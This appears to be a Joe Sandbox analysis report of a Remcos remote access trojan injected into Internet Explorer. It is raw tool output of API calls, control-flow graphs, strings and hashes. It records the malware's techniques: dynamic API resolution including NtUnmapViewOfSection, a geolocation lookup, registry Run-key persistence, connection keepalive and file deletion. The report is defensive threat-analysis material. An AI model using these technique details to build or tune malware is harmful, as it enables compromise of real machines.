2d7f2a8-2d7f2b2 CreateThread 451->455 458 2d7f2bd-2d7f2c0 454->458 459 2d7f2c9 454->459 455->454 463 2d7f307-2d7f322 call 2d71fab call 2d8353a 458->463 464 2d7f2c2-2d7f2c7 458->464 462 2d7f2ce-2d7f302 call 2d72093 call 2d752fd call 2d72093 call 2d8b580 call 2d71fd8 459->462 462->463 463->202 473 2d7f328-2d7f368 call 2d8bcef call 2d71f04 call 2d83656 call 2d71f09 call 2d71f04 463->473 464->462 489 2d7f381-2d7f386 DeleteFileW 473->489 490 2d7f36a-2d7f36d 489->490 491 2d7f388 489->491 490->172 492 2d7f36f-2d7f37c Sleep call 2d71f04 490->492 491->172 492->489
                                                  APIs
                                                    • Part of subcall function 02D8CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02D7EA1C), ref: 02D8CBF6
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CBFF
                                                    • Part of subcall function 02D8CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02D7EA1C), ref: 02D8CC16
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CC19
                                                    • Part of subcall function 02D8CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02D7EA1C), ref: 02D8CC2B
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CC2E
                                                    • Part of subcall function 02D8CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02D7EA1C), ref: 02D8CC3F
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CC42
                                                    • Part of subcall function 02D8CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02D7EA1C), ref: 02D8CC54
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CC57
                                                    • Part of subcall function 02D8CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02D7EA1C), ref: 02D8CC63
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CC66
                                                    • Part of subcall function 02D8CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02D7EA1C), ref: 02D8CC77
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CC7A
                                                    • Part of subcall function 02D8CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02D7EA1C), ref: 02D8CC8B
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CC8E
                                                    • Part of subcall function 02D8CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02D7EA1C), ref: 02D8CC9F
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CCA2
                                                    • Part of subcall function 02D8CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02D7EA1C), ref: 02D8CCB3
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CCB6
                                                    • Part of subcall function 02D8CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02D7EA1C), ref: 02D8CCC7
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CCCA
                                                    • Part of subcall function 02D8CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02D7EA1C), ref: 02D8CCDB
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CCDE
                                                    • Part of subcall function 02D8CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02D7EA1C), ref: 02D8CCEF
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CCF2
                                                    • Part of subcall function 02D8CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02D7EA1C), ref: 02D8CD03
                                                    • Part of subcall function 02D8CBE1: GetProcAddress.KERNEL32(00000000), ref: 02D8CD06
                                                    • Part of subcall function 02D8CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02D7EA1C), ref: 02D8CD14
                                                  • GetModuleFileNameW.KERNEL32(00000000,c:\program files (x86)\internet explorer\iexplore.exe,00000104), ref: 02D7EA29
                                                    • Part of subcall function 02D80F72: __EH_prolog.LIBCMT ref: 02D80F77
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                  • String ID: Access Level: $Administrator$Exe$Inj$Remcos Agent initialized$Software\$User$c:\program files (x86)\internet explorer\iexplore.exe$del$del$exepath$licence$license_code.txt
                                                  • API String ID: 2830904901-3967949104
                                                  • Opcode ID: 158655755ebd85d6845a0df57a31440ff710c9b7479ae80fff4932f476a5ba16
                                                  • Instruction ID: 6323d866cc3e1074278ed03624bb6ce2519364f8974cacce0ff35b7e44eb25c0
                                                  • Opcode Fuzzy Hash: 158655755ebd85d6845a0df57a31440ff710c9b7479ae80fff4932f476a5ba16
                                                  • Instruction Fuzzy Hash: 3032D561B443406BEA25B7709C65B7EA69BCFC1744F80095DE58A9B3C0FEACCD058BB1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 494 2d84f65-2d84fad call 2d720df call 2d8b944 call 2d720df call 2d71e65 call 2d71fab call 2dabb2c 507 2d84fbc-2d85008 call 2d72093 call 2d71e65 call 2d720f6 call 2d8beac call 2d7489e call 2d71e65 call 2d7b9f8 494->507 508 2d84faf-2d84fb6 Sleep 494->508 523 2d8500a-2d85079 call 2d71e65 call 2d7247c call 2d71e65 call 2d71fab call 2d71e65 call 2d7247c call 2d71e65 call 2d71fab call 2d71e65 call 2d7247c call 2d71e65 call 2d71fab call 2d7473d 507->523 524 2d8507c-2d85117 call 2d72093 call 2d71e65 call 2d720f6 call 2d8beac call 2d71e65 * 2 call 2d76c59 call 2d72f10 call 2d71fe2 call 2d71fd8 * 2 call 2d71e65 call 2d75b05 507->524 508->507 523->524 577 2d85119-2d85125 524->577 578 2d85127-2d8512e 524->578 579 2d85133-2d851c5 call 2d75aa6 call 2d7531e call 2d76383 call 2d72f10 call 2d72093 call 2d8b580 call 2d71fd8 * 2 call 2d71e65 call 2d71fab call 2d71e65 call 2d71fab call 2d84f24 577->579 578->579 606 2d85210-2d8521e call 2d7482d 579->606 607 2d851c7-2d8520b WSAGetLastError call 2d8cb72 call 2d752fd call 2d72093 call 2d8b580 call 2d71fd8 579->607 612 2d8524b-2d85260 call 2d74f51 call 2d748c8 606->612 613 2d85220-2d85246 call 2d72093 * 2 call 2d8b580 606->613 629 2d85ade-2d85af0 call 2d74e26 call 2d721fa 607->629 612->629 630 2d85266-2d853b9 call 2d71e65 * 2 call 2d7531e call 2d76383 call 2d72f10 call 2d76383 call 2d72f10 call 2d72093 call 2d8b580 call 2d71fd8 * 4 call 2d8b871 call 2d845f8 call 2d79097 call 2db1ed1 call 2d71e65 call 2d720f6 call 2d7247c call 2d71fab * 2 call 2d83733 612->630 613->629 643 2d85b18-2d85b20 call 2d71e8d 629->643 644 2d85af2-2d85b12 call 2d71e65 call 2d71fab call 2dabb2c Sleep 629->644 694 2d853bb-2d853c8 call 2d75aa6 630->694 695 2d853cd-2d853f4 call 2d71fab call 2d835e1 630->695 643->524 644->643 694->695 701 2d853fb-2d857ba call 2d7417e call 2d7ddc4 call 2d8bcd3 call 2d8bdaf call 2d8bc1f call 2d71e65 GetTickCount call 2d8bc1f call 2d8bb77 call 2d8bc1f * 2 call 2d8bb27 call 2d8bdaf * 5 call 2d7f90c call 2d8bdaf call 2d72f31 call 2d72ea1 call 2d72f10 call 2d72ea1 call 2d72f10 * 3 call 2d72ea1 call 2d72f10 call 2d76383 call 2d72f10 call 2d76383 call 2d72f10 call 2d72ea1 call 2d72f10 call 2d72ea1 call 2d72f10 call 2d72ea1 call 2d72f10 call 2d72ea1 call 2d72f10 call 2d72ea1 call 2d72f10 call 2d72ea1 call 2d72f10 call 2d72ea1 call 2d72f10 call 2d76383 call 2d72f10 * 5 call 2d72ea1 call 2d72f10 call 2d72ea1 call 2d72f10 * 7 call 2d72ea1 695->701 702 2d853f6-2d853f8 695->702 828 2d857bc call 2d74aa1 701->828 702->701 829 2d857c1-2d85a45 call 2d71fd8 * 50 call 2d71f09 call 2d71fd8 * 6 call 2d71f09 call 2d74c10 828->829 947 2d85a4a-2d85a51 829->947 948 2d85a53-2d85a5a 947->948 949 2d85a65-2d85a6c 947->949 948->949 950 2d85a5c-2d85a5e 948->950 951 2d85a78-2d85aaa call 2d75a6b call 2d72093 * 2 call 2d8b580 949->951 952 2d85a6e-2d85a73 call 2d7b08c 949->952 950->949 963 2d85aac-2d85ab8 CreateThread 951->963 964 2d85abe-2d85ad9 call 2d71fd8 * 2 call 2d71f09 951->964 952->951 963->964 964->629
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,00000029,02DE5300,02DE50F4,00000000), ref: 02D84FB6
                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 02D851C7
                                                  • Sleep.KERNEL32(00000000,00000002), ref: 02D85B12
                                                    • Part of subcall function 02D8B580: GetLocalTime.KERNEL32(00000000), ref: 02D8B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$ErrorLastLocalTime
                                                  • String ID: | $%I64u$5.2.0 Pro$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $c:\program files (x86)\internet explorer\iexplore.exe$hlight$name
                                                  • API String ID: 524882891-2591658630
                                                  • Opcode ID: 141dc6afc9ea8d3edd284cea0b381685d5a3917c268fb92202a7260a9ad52894
                                                  • Instruction ID: c1cbd741482f8b3bd8873b9e52ab51828d487f2d573abb905502a0dddcb1f27a
                                                  • Opcode Fuzzy Hash: 141dc6afc9ea8d3edd284cea0b381685d5a3917c268fb92202a7260a9ad52894
                                                  • Instruction Fuzzy Hash: 2B522B62A001545ADB19F731EC66AFEB376DF50300FA046A9D40AA73D4FF389E49CE61

                                                  Control-flow Graph

                                                  APIs
                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 02D7DBD5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LongNamePath
                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                  • API String ID: 82841172-425784914
                                                  • Opcode ID: 65e60b0c1e50f10d6dd76be777f82d91ce2c7fee2aaa75b5fadd5adcf2456947
                                                  • Instruction ID: bc32bfbff46676d53149671ae8779fae0dfe4b35c140f21da60770d6fe2835a1
                                                  • Opcode Fuzzy Hash: 65e60b0c1e50f10d6dd76be777f82d91ce2c7fee2aaa75b5fadd5adcf2456947
                                                  • Instruction Fuzzy Hash: A141F4321082415AE205F664EC51CAEF7BAEFA1751F50461EF446923D0FF68DD4DCAB2

                                                  Control-flow Graph

                                                  APIs
                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02D8B438
                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 02D8B44E
                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 02D8B467
                                                  • InternetCloseHandle.WININET(00000000), ref: 02D8B4AD
                                                  • InternetCloseHandle.WININET(00000000), ref: 02D8B4B0
                                                  Strings
                                                  • http://geoplugin.net/json.gp, xrefs: 02D8B448
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                  • String ID: http://geoplugin.net/json.gp
                                                  • API String ID: 3121278467-91888290
                                                  • Opcode ID: 13ba3bcdfbedd06c03767f62955b75ae6230b800b057dfd0c2dfe1e3c9f0c823
                                                  • Instruction ID: d6e0b907f46594cfb0677c2470c5b2e4da609d93d23079e9eefe10b6433e0b51
                                                  • Opcode Fuzzy Hash: 13ba3bcdfbedd06c03767f62955b75ae6230b800b057dfd0c2dfe1e3c9f0c823
                                                  • Instruction Fuzzy Hash: 0C11E7315093267BD724AA259C59EBF7F9DEF85764F10082EF805D2340DB649C08CAB2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1252 2d74f51-2d74f5f 1253 2d74f65-2d74f6c 1252->1253 1254 2d74fea 1252->1254 1256 2d74f74-2d74f7b 1253->1256 1257 2d74f6e-2d74f72 1253->1257 1255 2d74fec-2d74ff1 1254->1255 1258 2d74fc0-2d74fe8 CreateEventA CreateThread 1256->1258 1259 2d74f7d-2d74fbb GetLocalTime call 2d8bc1f call 2d752fd call 2d72093 call 2d8b580 call 2d71fd8 1256->1259 1257->1258 1258->1255 1259->1258
                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000001,02DE4EF0,02DE55A8,?,?,?,?,02D85D11,?,00000001), ref: 02D74F81
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,02DE4EF0,02DE55A8,?,?,?,?,02D85D11,?,00000001), ref: 02D74FCD
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 02D74FE0
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 02D74F94
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$EventLocalThreadTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 2532271599-1507639952
                                                  • Opcode ID: 7843c9f0d4e25ab9d1432eb687d8adc8e22aa80374d8947d934dcacb5c0d2981
                                                  • Instruction ID: f79f9ac5b3a50081ed2ba6d335c03997ad712ccb139b83c795ebeaa4d0679a25
                                                  • Opcode Fuzzy Hash: 7843c9f0d4e25ab9d1432eb687d8adc8e22aa80374d8947d934dcacb5c0d2981
                                                  • Instruction Fuzzy Hash: E911CA319002846ADB21BA76980DEEBFFBDDBD2715F44454EE88252384E6789C45CBB1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1269 2d8384f-2d83862 RegCreateKeyW 1270 2d838a1 1269->1270 1271 2d83864-2d8389f call 2d7247c call 2d71f04 RegSetValueExW RegCloseKey 1269->1271 1273 2d838a3-2d838b1 call 2d71f09 1270->1273 1271->1273
                                                  APIs
                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,02DE52E8), ref: 02D8385A
                                                  • RegSetValueExW.KERNELBASE(02DE52E8,?,00000000,00000001,00000000,00000000,02DE5300,?,02D7F85E,pth_unenc,02DE52E8), ref: 02D83888
                                                  • RegCloseKey.ADVAPI32(02DE52E8,?,02D7F85E,pth_unenc,02DE52E8), ref: 02D83893
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  • Opcode ID: c2717eac1e3d0cfc6d0b5bce97874a42f2fc949ba028ecc39515567007ba74ba
                                                  • Instruction ID: c2cddc2ede68d1cfc8119f059112b8511957bbc511dd371d8cb70e6d7e1b9a9d
                                                  • Opcode Fuzzy Hash: c2717eac1e3d0cfc6d0b5bce97874a42f2fc949ba028ecc39515567007ba74ba
                                                  • Instruction Fuzzy Hash: 41F0CD7288011AFBCF00AFA0EC45FFA773CEF00760F204654F80A96240EB359E14DAA0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1279 2d837aa-2d837c1 RegCreateKeyA 1280 2d837fa 1279->1280 1281 2d837c3-2d837f8 call 2d7247c call 2d71fab RegSetValueExA RegCloseKey 1279->1281 1283 2d837fc-2d8380a call 2d71fd8 1280->1283 1281->1283
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 02D837B9
                                                  • RegSetValueExA.KERNEL32(?,02DD74C8,00000000,?,00000000,00000000,02DE5300,?,?,02D7F88E,02DD74C8,5.2.0 Pro), ref: 02D837E1
                                                  • RegCloseKey.ADVAPI32(?,?,?,02D7F88E,02DD74C8,5.2.0 Pro), ref: 02D837EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  • Opcode ID: 8ab05f4ebd9097d2c946d713385da7e5a6fb7062241b2f0d8e54711a9be24c24
                                                  • Instruction ID: a4ab565aa51209d9909435bbe618b2df29a80c412fec307c9171598921862f10
                                                  • Opcode Fuzzy Hash: 8ab05f4ebd9097d2c946d713385da7e5a6fb7062241b2f0d8e54711a9be24c24
                                                  • Instruction Fuzzy Hash: 7BF06D72940119BBCB00AFA0DC55EFA7B6CEF04760F204694FD0AA6250EB359E14EBA0

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,02DE4F60), ref: 02D74DB3
                                                  • CreateThread.KERNEL32(00000000,00000000,?,02DE4F08,00000000,00000000), ref: 02D74DC7
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 02D74DD2
                                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 02D74DDB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                  • String ID:
                                                  • API String ID: 3360349984-0
                                                  • Opcode ID: 4b34420c0f562fa293540c26619b1f5d858054c65b6f88034db58f231e251cad
                                                  • Instruction ID: 8d30a36ed927cacd7996028a6ec42e43695eb22edafd0c7c80503311de1eeee7
                                                  • Opcode Fuzzy Hash: 4b34420c0f562fa293540c26619b1f5d858054c65b6f88034db58f231e251cad
                                                  • Instruction Fuzzy Hash: CD416E71649241AFCB15EB61CC54DBFB7AAEF94310F400A1DF89692390EB28DD088A62

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1337 2d8c516-2d8c53a CreateFileW 1338 2d8c53c-2d8c53e 1337->1338 1339 2d8c540-2d8c571 GetFileSize call 2d7244e call 2d71fab ReadFile 1337->1339 1340 2d8c57e-2d8c582 1338->1340 1345 2d8c573 1339->1345 1346 2d8c575-2d8c57c CloseHandle 1339->1346 1345->1346 1346->1340
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,02DE5300,00000000,02D82232), ref: 02D8C52F
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,02DE5300,00000000,02D82232), ref: 02D8C543
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,02DE5300,00000000,02D82232), ref: 02D8C568
                                                  • CloseHandle.KERNEL32(00000000,?,02DE5300,00000000,02D82232), ref: 02D8C576
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 3919263394-0
                                                  • Opcode ID: 05875adea2a4955761acc221b0f075daf7669f1ff2635c0ed72aaa02519a209e
                                                  • Instruction ID: 40a90eaa3d0bdc9196f63fb5461bd8c66142c2283ee3df341bd3d2e15f5b5447
                                                  • Opcode Fuzzy Hash: 05875adea2a4955761acc221b0f075daf7669f1ff2635c0ed72aaa02519a209e
                                                  • Instruction Fuzzy Hash: 60F0C2B164520ABFE7142A24AC98FFB779DDB877A4F10062AF841A23C0DB254D058531

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1347 2d83a5e-2d83a74 RegOpenKeyExW 1348 2d83a7a-2d83a8a RegDeleteValueW 1347->1348 1349 2d83a76-2d83a78 1347->1349 1350 2d83a8c-2d83a8f 1348->1350 1349->1350
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,02D7D17F,00000000,02DE52E8,02DE5300,?,pth_unenc), ref: 02D83A6C
                                                  • RegDeleteValueW.KERNEL32(?,?,?,pth_unenc), ref: 02D83A80
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02D83A6A
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteOpenValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 2654517830-1051519024
                                                  • Opcode ID: a1984fb8b32aacf7227681ef100af55f059653d31eb9b34c4ff4af37fd27f232
                                                  • Instruction ID: 92fe4b95f27b1cf2a68a260779afe46dae1d4b65b0513eec36fb12d1ed94596c
                                                  • Opcode Fuzzy Hash: a1984fb8b32aacf7227681ef100af55f059653d31eb9b34c4ff4af37fd27f232
                                                  • Instruction Fuzzy Hash: 75E01D71544109BBDF505F71DD07FFA7B6CD701F51F204694B90552251D731DD149660

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1351 2d83584-2d835ac RegOpenKeyExA 1352 2d835db 1351->1352 1353 2d835ae-2d835d9 RegQueryValueExA RegCloseKey 1351->1353 1354 2d835dd-2d835e0 1352->1354 1353->1354
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 02D835A4
                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,02DE5300), ref: 02D835C2
                                                  • RegCloseKey.KERNEL32(?), ref: 02D835CD
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 8faced208488dd9d7c17a3914b880a6dbc336b4eb2f7b56ce7f5e4c48df192e8
                                                  • Instruction ID: c18c3bd94c2e1ffa93c965124c818eaf537a0dffe1b35adb0d08927088ad9730
                                                  • Opcode Fuzzy Hash: 8faced208488dd9d7c17a3914b880a6dbc336b4eb2f7b56ce7f5e4c48df192e8
                                                  • Instruction Fuzzy Hash: 21F01D76D40219BFDF109EE09C45FED7BBCEB04B10F2044A5BE08E6240D6715E24EB90
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 02D838C0
                                                  • RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004,?,?,?,02D82160,02DD73B4,00000000), ref: 02D838DB
                                                  • RegCloseKey.KERNEL32(?,?,?,?,02D82160,02DD73B4,00000000), ref: 02D838E6
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID:
                                                  • API String ID: 1818849710-0
                                                  • Opcode ID: 2aeb70de3af4a940a9028f94c450aece81ad0d2ca1e9e485d88defe098fcd220
                                                  • Instruction ID: 57d94fec1da62e447ac64022d45864d7077335fafee74a500efce323ce091fe3
                                                  • Opcode Fuzzy Hash: 2aeb70de3af4a940a9028f94c450aece81ad0d2ca1e9e485d88defe098fcd220
                                                  • Instruction Fuzzy Hash: FBE03972940219BBDF109EA0DC06FEA7B6CEF04B60F204595BF08A6240D6358E24E7A0
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 02D8B85B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID: @
                                                  • API String ID: 1890195054-2766056989
                                                  • Opcode ID: a81a09bd0c84d21f293cc5f7ce75b5530559a01eb2ac45877038f71b1f8ea0ea
                                                  • Instruction ID: c72fcd7f6a74ab914411ffd25bee87278c4fe77da35d5f01a044610c66e71242
                                                  • Opcode Fuzzy Hash: a81a09bd0c84d21f293cc5f7ce75b5530559a01eb2ac45877038f71b1f8ea0ea
                                                  • Instruction Fuzzy Hash: F4D012B5801318DFC720DF98E80468DB7FCEB08210F00455AEC49E3300D770AC108B80
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountEventTick
                                                  • String ID:
                                                  • API String ID: 180926312-0
                                                  • Opcode ID: 1b7ca381153cbde42a7d13553adf3ab89bd90ef6372ee028c2ce9b255487e166
                                                  • Instruction ID: 634242a91ef20a2785eb3b8b5a5ba911df06108c83488c7149502f27e97cf34c
                                                  • Opcode Fuzzy Hash: 1b7ca381153cbde42a7d13553adf3ab89bd90ef6372ee028c2ce9b255487e166
                                                  • Instruction Fuzzy Hash: 845141326082405AC724FB31D865AFFB3A6EF91310F50492DE59A973D4FF349D09CA62
                                                  APIs
                                                    • Part of subcall function 02D83733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,02DE5300), ref: 02D8374F
                                                    • Part of subcall function 02D83733: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 02D83768
                                                    • Part of subcall function 02D83733: RegCloseKey.ADVAPI32(00000000), ref: 02D83773
                                                  • Sleep.KERNEL32(00000BB8), ref: 02D827B5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQuerySleepValue
                                                  • String ID: exepath
                                                  • API String ID: 4119054056-3629227966
                                                  • Opcode ID: dcb8bbe3008815659d7ac68a6ea7f78deb902096d49664026298ca84a5559c75
                                                  • Instruction ID: 31bcb94167b40de8ec618502a498da971f91538a737b9793294c88714cb5423f
